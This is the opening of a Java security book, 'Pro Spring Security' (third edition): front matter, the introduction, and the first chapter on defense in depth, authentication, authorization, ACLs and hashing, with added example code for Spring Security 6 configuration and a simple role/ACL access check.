Pro Spring Security
Securing Spring Framework 6
and Boot 3-based Java Applications
Third Edition

Massimo Nardone
Carlo Scarioni
Pro Spring Security: Securing Spring Framework 6 and Boot 3–based Java Applications, Third Edition
Massimo Nardone, Helsinki, Finland
Carlo Scarioni, Surbiton, UK

ISBN-13 (pbk): 979-8-8688-0034-4
ISBN-13 (electronic): 979-8-8688-0035-1

https://doi.org/10.1007/979-8-8688-0035-1

Copyright © 2024 by Massimo Nardone, Carlo Scarioni


This work is subject to copyright. All rights are reserved by the Publisher, whether the whole or part of the
material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation,
broadcasting, reproduction on microfilms or in any other physical way, and transmission or information
storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now
known or hereafter developed.
Trademarked names, logos, and images may appear in this book. Rather than use a trademark symbol with
every occurrence of a trademarked name, logo, or image we use the names, logos, and images only in an
editorial fashion and to the benefit of the trademark owner, with no intention of infringement of the
trademark.
The use in this publication of trade names, trademarks, service marks, and similar terms, even if they are not
identified as such, is not to be taken as an expression of opinion as to whether or not they are subject to
proprietary rights.
While the advice and information in this book are believed to be true and accurate at the date of publication,
neither the authors nor the editors nor the publisher can accept any legal responsibility for any errors or
omissions that may be made. The publisher makes no warranty, express or implied, with respect to the
material contained herein.
Managing Director, Apress Media LLC: Welmoed Spahr
Acquisitions Editor: Melissa Duffy
Development Editor: Laura Berendson
Coordinating Editor: Gryffin Winkler
Copy Editor: Kim Burton
Cover designed by eStudioCalamar
Cover image by Manuel Torres Garcia from Pixabay
Distributed to the book trade worldwide by Apress Media, LLC, 1 New York Plaza, New York, NY 10004,
U.S.A. Phone 1-800-SPRINGER, fax (201) 348-4505, e-mail orders-ny@springer-sbm.com, or visit
www.springeronline.com. Apress Media, LLC is a California LLC and the sole member (owner) is Springer
Science + Business Media Finance Inc (SSBM Finance Inc). SSBM Finance Inc is a Delaware corporation.
For information on translations, please e-mail booktranslations@springernature.com; for reprint,
paperback, or audio rights, please e-mail bookpermissions@springernature.com.
Apress titles may be purchased in bulk for academic, corporate, or promotional use. eBook versions and
licenses are also available for most titles. For more information, reference our Print and eBook Bulk Sales
web page at http://www.apress.com/bulk-sales.
Any source code or other supplementary material referenced by the author in this book is available to
readers on GitHub (https://github.com/Apress). For more detailed information, please visit https://www.
apress.com/gp/services/source-code.
Paper in this product is recyclable
I would like to dedicate this book to the memory of my beloved late
mother, Maria Augusta Ciniglio. Thanks, Mom, for all the great things
you have taught me, for making me a good person, for making me
study to become a computing scientist, and for the great memories you
left me. You will be loved and missed forever. I love you, Mom. RIP.
—Massimo
Table of Contents
About the Authors  ix
About the Technical Reviewer  xi
Acknowledgments  xiii
Introduction  xv

Chapter 1: The Scope of Security  1
  The Network Security Layer  4
  The Operating System Layer  5
  The Application Layer  5
    Authentication  6
    Authorization  7
    ACLs  9
  Authentication and Authorization: General Concepts  9
  What to Secure  14
  Additional Security Concerns  15
  Java Options for Security  17
  Summary  19

Chapter 2: Introducing Spring Security  21
  What Is Spring Security?  21
  Where Does Spring Security Fit In?  23
  Spring Security Overview  26
    What Is Spring Boot?  28
  Spring Framework 6: A Quick Overview  29
    JDK 17+ and Jakarta EE 9+ Baseline  30
    General Core Revision  30
    Core Container  30
    Data Access and Transactions  31
    Spring Messaging  32
    General Web Revision  32
    Spring MVC  32
    Spring WebFlux  32
    Observability  33
    Pattern Matching  33
    Testing  34
    Dependency Injection  34
    Aspect-Oriented Programming  36
  What's New in Spring Security 6?  38
  Summary  44

Chapter 3: Setting up the Scene  45
  Setting up the Development Environment  45
  Creating a New Java Web Application Project  52
  Adding Spring Security 6 to the Java Project  57
    Spring Security 6 Source  58
  Configuring the Spring Security 6 Web Project  65
  Summary  74

Chapter 4: Spring Security Architecture and Design  75
  What Components Make up Spring Security?  75
    The 10,000-Foot View  75
    The 1,000-Foot View  76
    The 100-Foot View  77
  Good Design and Patterns in Spring Security  116
    Strategy Pattern  117
    Decorator Pattern  117
    SRP  118
    DI  118
  Summary  118

Chapter 5: Web Security  121
  Configuring the new Spring Security 6 Project  126
  The Special URLs  142
    Custom Login Form  143
    Basic HTTP Authentication  150
    Digest Authentication  152
    Remember-Me Authentication  155
    Logging Out  158
    Session Management  161
  Summary  167

Chapter 6: Configuring Alternative Authentication Providers  169
  LDAP Authentication  185
    Using an Embedded LDAP  186
  X.509 Authentication  198
  OAuth 2.0  200
  JSON Web Token  201
  Spring WebSocket  202
  Java Authentication and Authorization Service  203
  Central Authentication Service  203
  Summary  204

Chapter 7: Business Object Security with ACLs  205
  ACL Key Concepts  205
  Summary  210

Chapter 8: Open Authorization 2.0 (OAuth 2.0) and Spring Security  211
  An Introduction to OAuth 2.0  211
    OAuth 2.0 Security  213
    Integrating OAuth 2.0 with Spring Security  214
    OAuth 2.0 Login  217
  Summary  238

Chapter 9: JSON Web Token (JWT) Authentication  239
  The REST API  239
    Introduction to JSON Web Token  242
  Summary  279

Index  281
About the Authors
Massimo Nardone has more than 27 years of experience in information and cybersecurity for IT/OT/IoT/IIoT, web/mobile development, cloud, and IT architecture. His true IT passions are security and Android. He has been programming and teaching how to program with Android, Perl, PHP, Java, VB, Python, C/C++, and MySQL for more than 27 years. He holds an MSc degree in computing science from the University of Salerno, Italy. Throughout his working career, he has held various positions, starting as a developer, then security teacher, PCI QSA, auditor, assessor, lead IT/OT/SCADA/cloud architect, CISO, BISO, executive, program director, and OT/IoT/IIoT security competence leader.
In his last working engagement, he worked as a seasoned cyber and information security executive, CISO, and OT, IoT, and IIoT security competence leader, helping many clients develop and implement cyber, information, OT, and IoT security activities.
His technical skills include security, OT/IoT/IIoT, Android, cloud, Java, MySQL, Drupal, Cobol, Perl, web and mobile development, MongoDB, D3, Joomla!, Couchbase, C/C++, WebGL, Python, Pro Rails, Django CMS, Jekyll, and Scratch. He has served as a visiting lecturer and exercises supervisor at the Helsinki University of Technology (Aalto University) Networking Laboratory.
He stays current with industry and security trends and is a board member of the ISACA Finland chapter, ISF, the Nordic CISO Forum, and the Android Global Forum. He holds four international patents (PKI, SIP, SAML, and Proxy areas). He currently works as a cybersecurity freelancer for IT/OT and IoT. Massimo has reviewed more than 55 IT books for different publishers and has coauthored Pro JPA 2 in Java EE 8 (Apress, 2018), Beginning EJB in Java EE 8 (Apress, 2018), and Pro Android Games (Apress, 2015).


Carlo Scarioni is a passionate software developer, motivated by learning and applying innovative and interesting software development tools, techniques, and methodologies. He has worked in the field for more than 18 years and moved across multiple languages, paradigms, and subject areas. He also has many years of experience working with Java and its ecosystem. He has been in love with Spring since the beginning, and he is fascinated by how Spring allows building complex applications out of discrete, focused modules and by the clever use of decorators to add cross-cutting functionalities. He has worked mostly with data engineering solutions in the last few years. He has been creating solutions around the use of modern data stack components in cloud environments while at the same time developing software using technologies such as Spark, Python, and others.

About the Technical Reviewer
Mario Faliero is a telecommunication engineer and entrepreneur. He has more than ten years of experience in radio frequency hardware engineering. Mario has extensive experience in numerical coding, using scripting languages (MATLAB, Python) and compiled languages (C/C++, Java). He has been responsible for developing electromagnetic assessment tools for space and commercial applications. Mario received his master's degree from the University of Siena.

Acknowledgments
Many thanks go to my wonderful family for supporting me while I was working on this
book. Luna, Leo, and Neve, you are the most beautiful reason of my life.
I want to thank my beloved late mother, Maria Augusta Ciniglio, who always
supported and loved me so much. I will love and miss you forever, my dearest mom.
Thanks to my beloved father, Giuseppe, and my brothers, Mario and Roberto, for
your endless love and for being the best dad and brothers in the world.
Many thanks to Melissa Duffy for giving me the opportunity to work as a writer on
this book, Shonmirin P. A. for doing such a great job during the editorial process and
supporting me, and Laura Berendson, development editor, for helping me to make it a
better book.
—Massimo Nardone

Introduction
Denying the impact of the Spring Framework in the Java world would be simply impossible. Spring has brought so many advantages to Java developers that we could say it has made us all better developers.
The previous edition of this book used Spring Security 5. In this new edition, it is therefore important to note the most significant changes from version 5 to version 6.
Spring Framework 6.0 was released on November 16, 2022. It came with a Java 17+ baseline and a move to Jakarta EE 9+ (in the jakarta namespace), focusing on the recently released Jakarta EE 10 APIs such as Servlet 6.0 and JPA 3.1. Spring's core building blocks, dependency injection and aspect-oriented programming, apply widely to business and infrastructure concerns, and application security certainly benefits from them. In version 6, Spring Security remains an application-level security framework built on top of the Spring Framework that deals mainly with the core security concepts of authentication and authorization, which are still its fundamental functionalities.
Spring Security aims to be a full-featured security solution for your Java applications. Although its focus is on web applications and the Java programming language, you will see that it goes beyond these two domains.
Among the changes in this version, the baseline for Spring Boot 3 and Spring Security 6 is Java 17.
The WebSecurityConfigurerAdapter class, which you previously extended to configure security settings, was deprecated in Spring Security 5.7 and removed in 6.0. Its replacement is a component-based approach in which you expose a bean of type SecurityFilterChain.
authorizeRequests() was also deprecated and replaced with authorizeHttpRequests(), and the antMatchers(), mvcMatchers(), and regexMatchers() methods were removed in Spring Security 6 and replaced by requestMatchers() for path-based access control, while securityMatcher() (or securityMatchers()) on HttpSecurity restricts which requests a given SecurityFilterChain applies to at all.
Also, in version 6, some updates were made to the OAuth 2.0 and SAML 2.0 support.
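The version 6 configuration style described above, as an added example that is not code from the book: a configuration class exposing two SecurityFilterChain beans, one scoped to the API with securityMatcher() and one for the browser-facing pages, both using authorizeHttpRequests() and requestMatchers(). The removed WebSecurityConfigurerAdapter form is shown in a comment for contrast. The package name, URL paths, and in-memory users are assumptions chosen for illustration.

```java
package com.example.security; // assumed package name for this example

import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.core.annotation.Order;
import org.springframework.http.HttpMethod;
import org.springframework.security.config.annotation.method.configuration.EnableMethodSecurity;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.core.userdetails.User;
import org.springframework.security.core.userdetails.UserDetails;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.crypto.factory.PasswordEncoderFactories;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.provisioning.InMemoryUserDetailsManager;
import org.springframework.security.web.SecurityFilterChain;

import static org.springframework.security.config.Customizer.withDefaults;

@Configuration
@EnableWebSecurity
@EnableMethodSecurity
public class SecurityConfig {

    // Spring Security 5.x style, no longer compiles on 6.x (shown for contrast only):
    //
    // public class SecurityConfig extends WebSecurityConfigurerAdapter {
    //     @Override
    //     protected void configure(HttpSecurity http) throws Exception {
    //         http.authorizeRequests()
    //             .antMatchers("/admin/**").hasRole("ADMIN")
    //             .anyRequest().authenticated()
    //             .and().formLogin();
    //     }
    // }

    // First chain: applies only to /api/**. securityMatcher() on HttpSecurity scopes the
    // whole chain; requests that do not match fall through to the next chain in @Order.
    @Bean
    @Order(1)
    SecurityFilterChain apiFilterChain(HttpSecurity http) throws Exception {
        http
            .securityMatcher("/api/**")
            .authorizeHttpRequests(auth -> auth
                // requestMatchers() replaces antMatchers()/mvcMatchers()/regexMatchers()
                .requestMatchers(HttpMethod.GET, "/api/public/**").permitAll()
                .anyRequest().hasRole("USER"))
            .httpBasic(withDefaults());
        return http.build();
    }

    // Second chain: everything else (browser-facing pages). Lower precedence than the
    // API chain because it has no explicit @Order.
    @Bean
    SecurityFilterChain webFilterChain(HttpSecurity http) throws Exception {
        http
            // authorizeHttpRequests() replaces authorizeRequests() and is backed by the
            // AuthorizationManager API rather than the older AccessDecisionManager.
            .authorizeHttpRequests(auth -> auth
                .requestMatchers("/", "/css/**", "/js/**").permitAll()
                .requestMatchers("/admin/**").hasRole("ADMIN")
                .anyRequest().authenticated())
            .formLogin(withDefaults());
        // CSRF protection stays enabled by default for this chain; do not disable it
        // for browser clients that authenticate with a session cookie.
        return http.build();
    }

    @Bean
    PasswordEncoder passwordEncoder() {
        // Delegating encoder: hashes new passwords with bcrypt and still verifies
        // hashes stored under other {id} prefixes, which eases migrating a user store.
        return PasswordEncoderFactories.createDelegatingPasswordEncoder();
    }

    @Bean
    UserDetailsService userDetailsService(PasswordEncoder encoder) {
        // Constructed sample users for local testing only; a production deployment
        // would back this with JDBC, LDAP, or another external user store.
        UserDetails user = User.builder()
            .username("user")
            .password(encoder.encode("change-me"))
            .roles("USER")
            .build();
        UserDetails admin = User.builder()
            .username("admin")
            .password(encoder.encode("change-me-too"))
            .roles("USER", "ADMIN")
            .build();
        return new InMemoryUserDetailsManager(user, admin);
    }
}
```

Ordering matters when several SecurityFilterChain beans exist: Spring Security picks the first chain whose securityMatcher accepts the request, so the narrowly scoped API chain must carry a lower @Order value than the catch-all chain, otherwise the catch-all chain would claim every request, including /api/**.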


In writing this book, we wanted to expose some of Spring Security's internal workings along with standard explanations of how to use certain features. The idea is to teach beyond the basics of how to do something in particular and instead focus on the plumbing inside the framework. This is the best way to learn something: seeing how it is built in the core. That's not to say that the book doesn't cover basic setups and give quick, practical advice on using the framework, because it certainly does. The point is that instead of saying, "Use this to do that," we say, "This works like this… and this allows you to…." This is a point of view that only tools like Spring can afford (because they are open source).
With that said, we suggest that the best way to use this book is to have the Spring Security source code checked out on your computer and go through the examples with both the code from the book and the code from Spring Security itself. This will help you understand each concept as it is introduced and teach more than one good programming trick and good practice. We recommend this approach for studying any software whenever you have the chance. If the source code is out there, grab it. Sometimes, a couple of lines of code teach more than a thousand words. This book primarily introduces Spring Boot 3, analyzes the Spring Framework, and develops Java web applications with Spring Security 6 and Java 17/20.
Also, Spring Security 6 supports many different authentication mechanisms, which are introduced and developed in this book, including user stores backed by the H2 and PostgreSQL databases, LDAP, X.509 certificates, OAuth 2.0, JWT, JAAS, and CAS.

Who This Book Is For

This book is written mainly for Java developers who use Spring in their work and need to add security to their applications in a way that leverages Spring's proven concepts and techniques. The book will also be helpful to developers who want to add web-layer security to their applications, even if those applications are not fully Spring-powered at their core.
The book assumes you have knowledge of Java and some of its tools and libraries, such as Servlet, Maven, OAuth 2.0, and JWT. It also assumes that you know what you want to use security for and in what context you want to use it. This means, for example, we won't explain protocols like LDAP in depth; instead, we'll concentrate on showing you how to integrate Spring Security with an LDAP user store. An in-depth knowledge of Spring is not essential because many of the concepts are introduced as we go along, but the more you understand about Spring, the more you are likely to get out of this book.


How This Book Is Structured

The book is divided into nine chapters that embody a progressive study of Spring Security. Starting from a summary of basic applications and an explanation of how the framework is structured, the content moves on to more advanced topics, such as OAuth 2.0 login and JWT authentication. The book follows a sequence corresponding to how this framework is normally used in real life.
The chapters in the book cover the following.
• Chapter 1 introduces security in general and how to approach security problems at the application level.
• Chapter 2 introduces Spring Security 6, how to use it, when to use it, and its security functionalities.
• Chapter 3 introduces Spring Security with a simple example application that secures web access at the URL level.
• Chapter 4 provides a full introduction to the architecture of Spring Security, including the main components and how they interact with each other.
• Chapter 5 gives in-depth coverage of the web-layer security options available in Spring Security.
• Chapter 6 covers a wide array of authentication providers, including H2, LDAP, and JAAS, which can be plugged into Spring Security.
• Chapter 7 covers access control lists (ACLs), which are used to secure individual domain objects, and how they fit into the general security concerns.
• Chapter 8 explains how to develop an application using Open Authorization 2.0 (OAuth 2.0) Login and Spring Security customization.
• Chapter 9 shows how to integrate Spring Security with JSON Web Token (JWT) authentication.

Prerequisites
The examples in this book are all built with Java 17 and Maven 3.9.2. The latest Spring versions are used where possible. Spring Security 6 is the version used throughout the book. Tomcat Web Server 10 is used for the different web applications in the book, mainly through its Maven plugin. The laptop is a ThinkPad Yoga 360 with 8 GB of RAM. All the projects were developed using IntelliJ IDEA Ultimate 2023.2.
You are free to use your own tools and operating system. Because everything is Java-based, you should be able to compile your programs on any platform without problems.

Downloading the Code


Any source code or other supplementary material referenced by the author in this book
is available to readers on GitHub (https://github.com/Apress). For more detailed
information, please visit www.apress.com/gp/services/source-code.

Contacting the Authors


You are more than welcome to send us any feedback regarding this book or any other subject we might help you with. You can contact Massimo Nardone via email at massimonardonedevchannel@gmail.com and Carlo Scarioni via his blog at http://cscarioni.blogspot.com, or you can send him email at carlo.scarioni@gmail.com.

CHAPTER 1

The Scope of Security

Security. It is an incredibly overloaded word in the IT, OT, and IoT world. It means so many different things in many different contexts, but in the end, it is all about protecting sensitive and valuable resources against malicious usage.
IT has many layers of infrastructure and code that can be subject to malicious attacks, and arguably, you should ensure that all these layers get the appropriate levels of protection.
Operational technology (OT) systems were generally isolated from external networks and operated independently. With the increasing connectivity and integration of OT systems with information technology (IT) networks and the Internet, the risk of cyberattacks targeting these systems has grown significantly. OT security aims to address these risks and protect against threats that could disrupt operations, cause physical damage, or impact public safety.
In the Internet of Things (IoT), security refers to the measures and practices implemented to protect the interconnected devices, networks, and data of IoT systems: networks of physical objects or "things" embedded with sensors, software, and connectivity to exchange data and perform various tasks. These objects range from household appliances and wearable devices to industrial machinery and infrastructure. Given the proliferation of IoT devices and their increasing integration into various domains, securing IoT systems is critical to mitigate potential risks and protect the privacy, integrity, and availability of their data and services.
The growth of the Internet and the pursuit of reaching more people with our applications have opened more doors to cybercriminals trying to access these applications illegitimately.
It is also true that good care is not always taken to ensure that a properly secured set of services is offered to the public. And sometimes, even when good care is taken, attackers are still able to overcome security barriers that, superficially, appear adequate.
The first step is to define a defense-in-depth strategy and its security layers.

© Massimo Nardone, Carlo Scarioni 2024
M. Nardone and C. Scarioni, Pro Spring Security, https://doi.org/10.1007/979-8-8688-0035-1_1

Defense in depth (also known as DiD) is a security strategy that involves implementing multiple layers of defense to protect a system or network from potential threats. It aims to provide a comprehensive and resilient security posture by incorporating various security measures at different levels, such as physical, technical, and administrative controls.
The defense-in-depth concept recognizes that no single security measure is foolproof, and relying on a single layer of defense can leave vulnerabilities. By employing multiple layers, other layers can still provide protection even if one is breached or compromised.
In practice, a defense-in-depth strategy can include a combination of measures such
as firewalls, intrusion detection systems, encryption, access controls, strong authentication
mechanisms, security awareness training, regular system updates and patching, network
segmentation, and physical security measures like locked doors and security cameras.
These layers collectively create a more robust and resilient security infrastructure.
The goal of a defense-in-depth strategy is to increase the difficulty for attackers,
making it harder for them to penetrate a system and move deeper into the network.
Requiring attackers to overcome multiple barriers increases the likelihood of detection
and mitigation, reducing the potential impact of a successful attack. Overall, it is a
proactive approach to security that emphasizes multiple layers of protection, reducing
the risk of successful attacks and minimizing the potential damage they can cause.
In general, a defense-in-depth strategy defines how the cybersecurity of the IT infrastructure is built up: how all the defensive mechanisms are layered to protect and secure data and information. A failing or weak defense-in-depth strategy is what allows a single flaw to turn into a successful attack on the IT infrastructure.
Let’s try to understand a bit more about defense-in-depth mechanisms. The controls fall into three broad categories (physical, technical, and administrative), and in practice they are deployed as the following layers.

• Physical controls are security measures that aim to protect the physical infrastructure and assets. They include surveillance cameras, access controls (such as locks and biometric systems), perimeter fencing, security guards, and intrusion detection systems.

• Perimeter security focuses on securing the boundary between the internal network and the external environment. It involves firewalls, intrusion prevention systems (IPS), and demilitarized zones (DMZs) to filter and monitor network traffic, control access, and prevent unauthorized entry.


• Network security measures aim to protect the internal network infrastructure. They include technologies such as network segmentation, virtual private networks (VPNs), intrusion detection systems (IDS), and IPS to detect and prevent unauthorized access, monitor network traffic, and detect and respond to potential threats.

• Identity and access management (IAM) controls ensure that only authorized individuals can access systems and resources. This includes strong authentication mechanisms like passwords, two-factor authentication (2FA), multi-factor authentication, access control policies, and privilege management to enforce least privilege principles.

• Application security focuses on securing the software and applications used within an organization. This involves implementing secure coding practices, regular vulnerability assessments and penetration testing, web application firewalls (WAFs), and application-level authentication and authorization mechanisms.

• Data encryption protects data by transforming it into a secure format that can only be accessed with the correct decryption key. It is used to secure data at rest (stored data) and in transit (data transmitted over networks).

• Security monitoring and incident response involve continuous monitoring of systems and networks, which is crucial to detecting and responding to security incidents. This includes using security information and event management (SIEM) tools, log analysis, IDS, and incident response plans to promptly identify and mitigate potential threats.

• Security awareness and training means educating employees and users about security best practices and potential threats. Regular security awareness training helps individuals understand their role in maintaining a secure environment and enables them to identify and report suspicious activities.


By combining these major controls, organizations can establish a multi-layered defense-in-depth security approach that increases overall resilience against various threats.
Figure 1-1 shows typical defense-in-depth mechanisms defining IT infrastructure
security layers.

Figure 1-1. Defense-in-depth mechanisms and IT infrastructure layers

The three major security layers in an IT infrastructure are the network, the operating
system (part of the endpoint security layer), and the application itself.

The Network Security Layer


The network security layer is probably the most familiar one in the IT world. When
people talk about IT security, they normally think of network-level security—in
particular, security that uses firewalls.
Even though people often associate security with the network level, this is only a
very limited layer of protection against attackers. Generally speaking, it can do no more
than defend IP addresses and filter network packets addressed to certain ports in certain
machines in the network.


This is not enough in most cases, as traffic at this level is normally allowed to enter the publicly open ports of your various exposed services without restriction. Different attacks can be targeted at these open services; an attacker who finds a vulnerable service behind an open port may be able to execute arbitrary commands on the host and bypass your security constraints. Tools like the popular nmap (http://nmap.org/) can scan a machine to find open ports. Using such tools is an easy first step in preparing an attack because well-known attacks can be used against such open ports if they are not properly secured.
A very important part of the network-layer security, in the case of web applications, is the use of Transport Layer Security (TLS, the successor to the now-deprecated Secure Sockets Layer, SSL) to encrypt all sensitive information sent along the wire, but this is related more to the network protocol at the application level than to the packet-filtering level at which firewalls operate.

The Operating System Layer


The operating system layer is probably the most important one in the whole security
schema, as a properly secured operating system (OS) environment can at least prevent a
whole host machine from going down if a particular application is compromised.
If an attacker is somehow allowed to have unsecured access to the operating system,
they can basically do whatever they want—from spreading viruses to stealing passwords
or deleting your whole server’s data and making it unusable. Even worse, they could
take control of your computer without you even noticing and use it to perform other
malicious acts as part of a botnet. This layer can include the deployment model of the
applications since you need to know your operating system’s permission scheme to
ensure that you don’t give your applications unnecessary privileges over your machine.
Applications should run as isolated as possible from the other components of the host
machine.

The Application Layer


The primary focus of this book is on the application layer. The application security layer
refers to all the constraints you establish in your applications to make sure that only the
right people can do the right things when working through the application.


Applications, by default, are open to countless avenues of attack. An improperly secured application can allow an attacker to steal information from the application, impersonate other users, execute restricted operations, corrupt data, gain access to the operating system level, and perform many other malicious acts.
This book covers application-level security, which is the domain of Spring Security.
Application-level security is achieved by implementing several techniques, and there
are a few concepts that help you understand better what the book covers. They are
the main concerns that Spring Security addresses to provide your applications with
comprehensive protection against threats. The following three subsections introduce
authentication, authorization, and ACLs.

Authentication
Authentication is the process of verifying the identity of a user or entity attempting
to access an application. It ensures that the user is who they claim to be. Common
authentication methods include the following.

• Username and password: Users provide a unique username and corresponding password.

• Multi-factor authentication (MFA): Users provide multiple forms of identification, such as a password and a one-time verification code sent to their mobile device.

• Biometric authentication: Users verify their identity using unique physical characteristics, such as fingerprints, facial recognition, or iris scans.

The authentication process allows an application to validate that a particular user is who they claim they are. In the authentication process, a user presents the application with information about herself (normally, a username and a password) that no one else knows. The application takes this information and tries to match it against the information stored (normally in a database or LDAP (Lightweight Directory Access Protocol) server [1], and normally as a password hash rather than the password itself). If the information the user provides matches a record in the authentication server, the user is successfully authenticated. The application normally

[1] LDAP is explained in some detail in Chapter 8, where various authentication providers are covered.


creates an internal abstraction representing this authenticated user in the system. Figure 1-2 shows the authentication mechanism.

Figure 1-2. Simple, standard authentication mechanism

Authorization
Authorization determines what actions or resources a user can access within an
application. Once a user is authenticated, authorization mechanisms control their
permissions based on predefined rules and policies. This ensures that users can only
access the features and data they are authorized to use. Authorization can be role-based,
attribute-based, or rule-based.

• Role-based access control (RBAC): Users are assigned roles, and permissions are granted based on those roles. For example, a manager role may access certain administrative features, while a regular user role may only access basic functionalities.

• Attribute-based access control (ABAC): Access is granted based on specific attributes or characteristics of the user, such as job title, department, or location.


• Rule-based access control: Access control rules are defined based on predefined conditions or criteria. For example, granting access during specific timeframes or based on certain data conditions.

When a user is authenticated, that only means that the user is known to the system
and has been recognized by it. It doesn’t mean that the user is free to do whatever she
wants in said system. The next logical step in securing an application is determining
which actions the user can perform and which resources she can access. If the user
doesn’t have the proper permissions, she cannot carry out that particular action. This
is the work of the authorization process. In the most common case, the authorization
process compares the user’s set of permissions against the permissions required
to execute a particular action in the application, and if a match is found, access is
granted. On the other hand, if no match is found, access is denied. Figure 1-3 shows the
authorization mechanism.

Figure 1-3. Simple authorization process: the authenticated user tries to access a
secured resource


ACLs
An access control list (ACL) manages access rights and permissions to specific resources
or objects within an application. It is typically used in conjunction with authorization.
An ACL defines who has access to a particular resource and what actions they can
perform on that resource. It consists of a list of users or groups and their corresponding
permissions (read, write, execute, etc.) for specific resources.
ACLs are part of the authorization process explained in the previous section. The key
difference is that ACLs normally work at a finer-grained level in the application. ACLs
are a collection of mappings between resources, users, and permissions. With ACLs, you
can establish rules like “User John has administrative permission on the blog post X” or
“User Luis has read permission on blog post X.” You can see the three elements: user,
permission, and resource. Figure 1-3 shows how ACLs work; they are just a special case
of the general authorization process.
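As an added illustration (example code written for this edit, not from the book’s sample projects or from Spring Security itself), the following stand-alone Java program implements the role-based decision of Figure 1-3 and the finer-grained ACL triples (user, permission, resource) described above. The Permission enum, the AclRegistry, and the role-to-permission table are invented for the example; Spring Security’s own classes for this are covered in later chapters.

```java
import java.util.Arrays;
import java.util.EnumSet;
import java.util.HashMap;
import java.util.Map;
import java.util.Set;

// Added illustration of the authorization and ACL checks described in the text.
// Permission, AclRegistry and the role table are invented for this example;
// they are not Spring Security classes.
public class AuthorizationDemo {

    // Coarse-grained: what a role is allowed to do anywhere in the application.
    enum Permission { READ, WRITE, ADMIN }

    // Role -> permissions. Users inherit the permissions of every role they hold.
    static final Map<String, Set<Permission>> ROLE_PERMISSIONS = Map.of(
            "ROLE_USER",   EnumSet.of(Permission.READ),
            "ROLE_EDITOR", EnumSet.of(Permission.READ, Permission.WRITE),
            "ROLE_ADMIN",  EnumSet.allOf(Permission.class));

    // An authenticated principal: who they are and which roles they hold.
    record User(String name, Set<String> roles) {
        Set<Permission> permissions() {
            EnumSet<Permission> granted = EnumSet.noneOf(Permission.class);
            for (String role : roles) {
                granted.addAll(ROLE_PERMISSIONS.getOrDefault(role, Set.of()));
            }
            return granted;
        }
    }

    // Fine-grained: per-object grants of the form (resource, user) -> permissions.
    static class AclRegistry {
        private final Map<String, Map<String, Set<Permission>>> entries = new HashMap<>();

        void grant(String resourceId, String userName, Permission... perms) {
            entries.computeIfAbsent(resourceId, k -> new HashMap<>())
                   .computeIfAbsent(userName, k -> EnumSet.noneOf(Permission.class))
                   .addAll(Arrays.asList(perms));
        }

        boolean isGranted(String resourceId, String userName, Permission perm) {
            return entries.getOrDefault(resourceId, Map.of())
                          .getOrDefault(userName, Set.of())
                          .contains(perm);
        }
    }

    // Role-based decision: does the user's permission set cover the requirement?
    static boolean roleAllows(User user, Permission required) {
        return user.permissions().contains(required);
    }

    // Combined decision: an explicit ACL entry for this object grants access;
    // otherwise fall back to the role-based check. Anything else is denied.
    static boolean canAccess(AclRegistry acl, User user, String resourceId, Permission required) {
        if (acl.isGranted(resourceId, user.name(), required)) {
            return true;
        }
        return roleAllows(user, required);
    }

    public static void main(String[] args) {
        // Constructed sample users and a single object-level grant.
        User john = new User("john", Set.of("ROLE_ADMIN"));
        User luis = new User("luis", Set.of("ROLE_USER"));
        AclRegistry acl = new AclRegistry();
        acl.grant("blogpost:X", "luis", Permission.WRITE);

        // john: decided by his role; luis on post X: decided by the ACL entry;
        // luis on post Y: no entry and no role permission, so denied.
        System.out.println("john ADMIN on X: " + canAccess(acl, john, "blogpost:X", Permission.ADMIN));
        System.out.println("luis WRITE on X: " + canAccess(acl, luis, "blogpost:X", Permission.WRITE));
        System.out.println("luis WRITE on Y: " + canAccess(acl, luis, "blogpost:Y", Permission.WRITE));
    }
}
```

The deny-by-default shape of canAccess is the point: an authorization check should return true only when a matching grant is found, never because no rule happened to forbid the action.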

Authentication and Authorization: General Concepts


This section introduces and explains fundamental security concepts that you will come
across frequently in the book.

• User: The first step in securing a system from malicious attackers is identifying legitimate users and allowing access to them alone. User abstractions are created in the system and given their own identity. They are the users that are later allowed to use the system.

• Credentials: Credentials are the way a user proves who they are.
Normally, in the shape of passwords (certificates are also a common
way of presenting credentials), they are data that only the owner of
it knows.

• Role: In an application security context, a role can be seen as a logical grouping of users. This logical grouping is normally done so the grouped users share a set of permissions in the application to access certain resources. For example, all users with the admin role have the same access and permissions to the same resources. Roles are a way to group permissions to execute determined actions, making users with those roles inherit such permissions.


• Resource: Any part of the application you want to access that needs
to be properly secured against unauthorized access—for example, a
URL, a business method, or a particular business object.

• Permissions: The access level needed to access a particular resource. For example, two users may be allowed to read a particular document, but only one can write to it. Permissions can apply to individual users or users that share a particular role.

• Encryption: It allows you to protect sensitive information (normally passwords, but it can be something else, like cookies) so that it is incomprehensible to attackers even if they get access to the protected version. The idea is that you never store the plain text version of a password but instead store a one-way hash of it (see the next list), so that nobody but the owner knows the original one.

The following describes types of encryption algorithms.

• One-way encryption: These algorithms, more properly referred to as hashing algorithms, take an input string and generate a fixed-size output known as the message digest. It is computationally infeasible to recover the original string from the digest, which is why the technique is referred to as one-way encryption. For password storage, a plain fast hash such as SHA-256 is not enough on its own: use a salted, deliberately slow function such as bcrypt, scrypt, Argon2, or PBKDF2.

For example, suppose the requesting client hashes a string and sends the hashed string to the server. The server may have access to the original information (from a previous registration process, for example), and if it does, it can apply the same hash function and compare the output with the value sent by the client. If they match, the server validates the information. (In a typical web login the client sends the password itself over TLS and the server does the hashing; if the client sends the hash, that hash is effectively the password, and anyone who captures it can replay it.)

Figure 1-4 shows this scheme. Usually, the server doesn’t even need the original data. It can simply store the hashed version and then compare it with the incoming hash from the client.


Figure 1-4. One-way encryption or hashing

• Symmetric encryption: These algorithms provide two functions: encrypt and decrypt. A string of text is converted into an encrypted form and then can be converted back to the original string. In this scheme, a sender and a receiver share the same keys to encrypt and decrypt messages on both ends of the communication. One problem with this scheme is how to share the key between the endpoints of the communication. A common approach is to use a parallel secure channel to send the keys.

• Key: Symmetric encryption uses a single shared secret key for encryption and decryption. This means that both the sender and the recipient use the same key.


